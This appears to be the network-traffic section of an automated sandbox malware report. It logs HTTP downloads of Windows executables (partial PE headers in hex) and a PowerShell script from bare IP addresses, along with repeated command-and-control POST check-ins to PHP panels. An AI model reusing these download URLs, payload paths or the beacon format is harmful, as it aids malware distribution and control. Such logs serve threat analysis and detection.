Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:18 GMTContent-Type: application/octet-streamContent-Length: 360448Last-Modified: Mon, 23 Sep 2024 14:42:37 GMTConnection: keep-aliveETag: "66f17e5d-58000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 3c 94 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 aa 04 00 00 d2 00 00 00 00 00 00 c0 d3 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8a e5 04 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 d0 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac e6 04 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dd a8 04 00 00 10 00 00 00 aa 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b1 29 00 00 00 c0 04 00 00 2a 00 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 f0 00 00 00 f0 04 00 00 5e 00 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d0 48 00 00 00 f0 05 00 00 4a 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Sep 2024 13:37:22 GMTContent-Type: application/octet-streamContent-Length: 10796768Last-Modified: Fri, 20 Sep 2024 14:29:18 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ed86be-a4bee0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 5d 95 67 ab 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 f2 4e 00 00 f0 54 00 00 00 00 00 7e 10 4f 00 00 20 00 00 00 20 4f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 a4 00 00 04 00 00 65 29 a5 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 30 10 4f 00 4b 00 00 00 00 40 4f 00 56 e2 54 00 00 00 00 00 00 00 00 00 00 f0 a3 00 e0 d8 00 00 00 40 a4 00 0c 00 00 00 eb 0f 4f 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 f0 4e 00 00 20 00 00 00 f2 4e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 a4 08 00 00 00 20 4f 00 00 0a 00 00 00 f6 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 56 e2 54 00 00 40 4f 00 00 e4 54 00 00 00 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 a4 00 00 02 00 00 00 e4 a3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:37:34 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 23 Sep 2024 15:59:37 GMTETag: "65ec4b-622cb79d4984d"Accept-Ranges: bytesContent-Length: 6679627Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d5 30 f1 66 00 4c 5f 00 d4 26 00 00 e0 00 06 01 0b 01 02 23 00 e6 47 00 00 9e 5a 00 00 e2 66 00 b0 14 00 00 00 10 00 00 00 00 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 c6 00 00 06 00 00 87 ce 66 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 80 b3 00 42 00 00 00 00 90 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b3 00 d4 29 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 ad 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 91 b3 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 e4 47 00 00 10 00 00 00 e6 47 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 a8 15 00 00 00 00 48 00 00 16 00 00 00 ec 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 18 9f 00 00 00 20 48 00 00 a0 00 00 00 02 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2f 34 00 00 00 00 00 00 c8 c7 03 00 00 c0 48 00 00 c8 03 00 00 a2 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 b4 e1 66 00 00 90 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 42 00 00 00 00 80 b3 00 00 02 00 00 00 6a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 e4 09 00 00 00 90 b3 00 00 0a 00 00 00 6c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 34 00 00 00 00 a0 b3 00 00 02 00 00 00 76 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 b0 b3 00 00 02 00 00 00 78 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 d4 29 0e 00 00 c0 b3 00 00 2a 0e 00 00 7a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 34 00 00 00 00 00 90 06 00 00 00 f0 c1 00 00 08 00 00 00 a4 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 32 39 00 00 00 00 00 c4 a7 01 00 00 00 c2 00 00 a8 01 00 00 ac 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 31 00 00 00 00 00 58 4c 00 00 00 b0 c3 00 00 4e 00 00 00 54 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 35 00 00 00 00 00 42 e3
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:43 GMTContent-Type: application/octet-streamContent-Length: 311296Last-Modified: Sun, 22 Sep 2024 20:59:29 GMTConnection: keep-aliveETag: "66f08531-4c000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 b6 e6 ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 d6 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 68 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc e9 02 00 00 20 00 00 00 ec 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 c9 01 00 00 20 03 00 00 cc 01 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 04 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /frm/_vti_cnf/Blenar.exe HTTP/1.1Host: www.leopardi.nl
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 35 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000015002&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/blo.ps1 HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /test/blo.ps1 HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /test/blo.ps1 HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 31 38 30 34 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000018042&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 39 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000019101&unit=246122658369
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000020001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 45 34 31 43 46 46 43 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBAE41CFFCFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic HTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
